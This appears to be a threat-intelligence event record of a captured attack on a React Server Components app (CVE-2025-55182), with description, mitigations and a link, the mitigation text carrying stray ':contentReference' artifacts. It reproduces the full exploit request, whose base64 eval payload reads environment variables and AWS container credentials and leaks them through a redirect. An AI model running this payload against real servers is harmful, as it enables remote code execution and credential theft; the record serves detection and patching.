Security event information ca9ab33fb944a704897d7fcbf1234c21

Информация об атаке

Tag
CVE-2025-55182

Date
2026-05-09

Client IP
5.35.98.193

Client GEO
russia

Vendor
Meta

Product
React

RAW request
POST / HTTP/1.0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/█████████ Safari/537.36 Host: blog.██████ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWRrO9Dm4nh1w Content-Length: 1905 X-Forwarded-For: ███████████ Accept-Encoding: gzip Next-Action: x Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D Next-Url: / Origin: https://blog.██████ Referer: https://blog.██████ X-Ja3-Fingerprint: e69402f870ecf542b4f017b0ed32936a X-Ja4-Fingerprint: t13d1312h2_f57a46bbacb6_e5728521abd4 X-Nextjs-Html-Request-Id: Ke44Jvtxlc X-Nextjs-Request-Id: AgmDjUuKUY Connection: close ------WebKitFormBoundaryWRrO9Dm4nh1w Content-Disposition: form-data; name="Yg6RIsgU" +8JnbN2Tt5MNsNs3CLtx64tpZR4J6C44J0bYbMvc91oZ1C1OIhI8lB+NVqtL/fxqzCNtS9Un3NcVxZ1cv39+UkxJcacanA3FDMm0SPg2nZgcEiQGnSEe6/IgfindCJTizuvdYit+2UjcIAJdhtyuGzEZH2HpIIGR20Qs9yEaJF4cM6sNCQ+UbJIx8bJCD6Sq3BKaZezsA7oUEj6tTHQS+KXfRNpYdYV000K6C3cvSm36h358Y/IZPe1NVtzQ32Ms ------WebKitFormBoundaryWRrO9Dm4nh1w Content-Disposition: form-data; name="0" {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"eval(Buffer.from('dmFyIF9yPSh0eXBlb2YgcmVxdWlyZSE9PSd1bmRlZmluZWQnP3JlcXVpcmU6KHByb2Nlc3MubWFpbk1vZHVsZSYmcHJvY2Vzcy5tYWluTW9kdWxlLnJlcXVpcmUpfHxudWxsKSxodD1udWxsO3RyeXtpZihfcilodD1fcignaHR0cCcpfWNhdGNoKGUpe312YXIgb3V0PXtlbnY6cHJvY2Vzcy5lbnZ9O3ZhciBlY3NVcmk9KHByb2Nlc3MuZW52LkFXU19DT05UQUlORVJfQ1JFREVOVElBTFNfUkVMQVRJVkVfVVJJfHwnJyk7aWYoaHQmJmVjc1VyaSl7dHJ5e3ZhciBkb25lPWZhbHNlLGJvZHk9Jyc7dmFyIHJlcT1odC5nZXQoJ2h0dHA6Ly8xNjkuMjU0LjE3MC4yJytlY3NVcmksZnVuY3Rpb24ocmVzKXtyZXMub24oJ2RhdGEnLGZ1bmN0aW9uKGQpe2JvZHkrPWQudG9TdHJpbmcoKX0pO3Jlcy5vbignZW5kJyxmdW5jdGlvbigpe291dC5lY3NfY3JlZHM9Ym9keTtkb25lPXRydWV9KX0pO3JlcS5zZXRUaW1lb3V0KDMwMDAsZnVuY3Rpb24oKXtyZXEuZGVzdHJveSgpfSk7dmFyIHQ9RGF0ZS5ub3coKTt3aGlsZSghZG9uZSYmRGF0ZS5ub3coKS10PDQwMDApe3JlcXVpcmUoJ3RpbWVycycpLnNldEltbWVkaWF0ZShmdW5jdGlvbigpe30pfXJlcS5kZXN0cm95KCk7fWNhdGNoKGUpe319dmFyIGI2ND1CdWZmZXIuZnJvbShKU09OLnN0cmluZ2lmeShvdXQpKS50b1N0cmluZygnYmFzZTY0Jyk7dGhyb3cgT2JqZWN0LmFzc2lnbihuZXcgRXJyb3IoJ05FWFRfUkVESVJFQ1QnKSx7ZGlnZXN0OidORVhUX1JFRElSRUNUO3B1c2g7L2xvZ2luP2E9JytiNjQrJzszMDc7J30pOw==','base64').toString())","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}} ------WebKitFormBoundaryWRrO9Dm4nh1w Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryWRrO9Dm4nh1w Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryWRrO9Dm4nh1w--

RAW request

POST / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/█████████ Safari/537.36
Host: blog.██████
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWRrO9Dm4nh1w
Content-Length: 1905
X-Forwarded-For: ███████████
Accept-Encoding: gzip
Next-Action: x
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Next-Url: /
Origin: https://blog.██████
Referer: https://blog.██████
X-Ja3-Fingerprint: e69402f870ecf542b4f017b0ed32936a
X-Ja4-Fingerprint: t13d1312h2_f57a46bbacb6_e5728521abd4
X-Nextjs-Html-Request-Id: Ke44Jvtxlc
X-Nextjs-Request-Id: AgmDjUuKUY
Connection: close

------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="Yg6RIsgU"

+8JnbN2Tt5MNsNs3CLtx64tpZR4J6C44J0bYbMvc91oZ1C1OIhI8lB+NVqtL/fxqzCNtS9Un3NcVxZ1cv39+UkxJcacanA3FDMm0SPg2nZgcEiQGnSEe6/IgfindCJTizuvdYit+2UjcIAJdhtyuGzEZH2HpIIGR20Qs9yEaJF4cM6sNCQ+UbJIx8bJCD6Sq3BKaZezsA7oUEj6tTHQS+KXfRNpYdYV000K6C3cvSm36h358Y/IZPe1NVtzQ32Ms
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"eval(Buffer.from('dmFyIF9yPSh0eXBlb2YgcmVxdWlyZSE9PSd1bmRlZmluZWQnP3JlcXVpcmU6KHByb2Nlc3MubWFpbk1vZHVsZSYmcHJvY2Vzcy5tYWluTW9kdWxlLnJlcXVpcmUpfHxudWxsKSxodD1udWxsO3RyeXtpZihfcilodD1fcignaHR0cCcpfWNhdGNoKGUpe312YXIgb3V0PXtlbnY6cHJvY2Vzcy5lbnZ9O3ZhciBlY3NVcmk9KHByb2Nlc3MuZW52LkFXU19DT05UQUlORVJfQ1JFREVOVElBTFNfUkVMQVRJVkVfVVJJfHwnJyk7aWYoaHQmJmVjc1VyaSl7dHJ5e3ZhciBkb25lPWZhbHNlLGJvZHk9Jyc7dmFyIHJlcT1odC5nZXQoJ2h0dHA6Ly8xNjkuMjU0LjE3MC4yJytlY3NVcmksZnVuY3Rpb24ocmVzKXtyZXMub24oJ2RhdGEnLGZ1bmN0aW9uKGQpe2JvZHkrPWQudG9TdHJpbmcoKX0pO3Jlcy5vbignZW5kJyxmdW5jdGlvbigpe291dC5lY3NfY3JlZHM9Ym9keTtkb25lPXRydWV9KX0pO3JlcS5zZXRUaW1lb3V0KDMwMDAsZnVuY3Rpb24oKXtyZXEuZGVzdHJveSgpfSk7dmFyIHQ9RGF0ZS5ub3coKTt3aGlsZSghZG9uZSYmRGF0ZS5ub3coKS10PDQwMDApe3JlcXVpcmUoJ3RpbWVycycpLnNldEltbWVkaWF0ZShmdW5jdGlvbigpe30pfXJlcS5kZXN0cm95KCk7fWNhdGNoKGUpe319dmFyIGI2ND1CdWZmZXIuZnJvbShKU09OLnN0cmluZ2lmeShvdXQpKS50b1N0cmluZygnYmFzZTY0Jyk7dGhyb3cgT2JqZWN0LmFzc2lnbihuZXcgRXJyb3IoJ05FWFRfUkVESVJFQ1QnKSx7ZGlnZXN0OidORVhUX1JFRElSRUNUO3B1c2g7L2xvZ2luP2E9JytiNjQrJzszMDc7J30pOw==','base64').toString())","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryWRrO9Dm4nh1w--

Description
CVE-2025-55182 affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0. :contentReference The root cause is unsafe deserialization in the RSC “Flight” protocol: when the server receives a specially crafted payload via HTTP request to a Server Function endpoint, the payload is deserialized without proper validation. This can lead to prototype-pollution, or injection of malicious objects, which allows execution of arbitrary JS code — effectively an RCE. The attack requires no authentication, has low complexity, and can be triggered via a single HTTP request. Because many popular frameworks (e.g. Next.js, React Router, Waku, Parcel/Vite RSC plugins, rwsdk) rely on the vulnerable packages, a large portion of web-apps are at risk. The vulnerability was publicly disclosed on December 3, 2025, and patches released shortly after.

Description

CVE-2025-55182 affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0. :contentReference

The root cause is unsafe deserialization in the RSC “Flight” protocol: when the server receives a specially crafted payload via HTTP request to a Server Function endpoint, the payload is deserialized without proper validation. This can lead to prototype-pollution, or injection of malicious objects, which allows execution of arbitrary JS code — effectively an RCE.

The attack requires no authentication, has low complexity, and can be triggered via a single HTTP request.

Because many popular frameworks (e.g. Next.js, React Router, Waku, Parcel/Vite RSC plugins, rwsdk) rely on the vulnerable packages, a large portion of web-apps are at risk.

The vulnerability was publicly disclosed on December 3, 2025, and patches released shortly after.

Mitigations
Upgrade React-server-dom packages: Immediately update affected packages to patched versions (for example react-server-dom-webpack/parcel/turbopack → 19.0.1, 19.1.2 или 19.2.1). Audit dependencies: Проверьте, не включены ли в проект фреймворки или сборщики, использующие RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до безопасных версий. :contentReference Disable or restrict RSC endpoints: Если возможно — временно отключите серверные функции React (Server Functions) или ограничьте доступ к ним через firewall / WAF / настройку сети. :contentReference Runtime protection: Используйте WAF, EASM/ASM, мониторинг поведения, IDS/IPS, чтобы обнаруживать подозрительные запросы и пост-эксплуатационную активность. :contentReference Code review / validation: Пересмотрите обработку входящих данных, избегайте десериализации непроверенных объектов, особенно если приложение принимает пользовательские payload’ы. (Может потребоваться дополнительная проверка/валидация deserialized data.)

Mitigations


Upgrade React-server-dom packages: Immediately update affected packages to patched versions (for example react-server-dom-webpack/parcel/turbopack → 19.0.1, 19.1.2 или 19.2.1).
Audit dependencies: Проверьте, не включены ли в проект фреймворки или сборщики, использующие RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до безопасных версий. :contentReference
Disable or restrict RSC endpoints: Если возможно — временно отключите серверные функции React (Server Functions) или ограничьте доступ к ним через firewall / WAF / настройку сети. :contentReference
Runtime protection: Используйте WAF, EASM/ASM, мониторинг поведения, IDS/IPS, чтобы обнаруживать подозрительные запросы и пост-эксплуатационную активность. :contentReference
Code review / validation: Пересмотрите обработку входящих данных, избегайте десериализации непроверенных объектов, особенно если приложение принимает пользовательские payload’ы. (Может потребоваться дополнительная проверка/валидация deserialized data.)

Links
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

Community

Contacts

Cloud

Sattelite

Информация об атаке

Engine

Sattelite

Radar

Cloud

Blog

Community

Контакты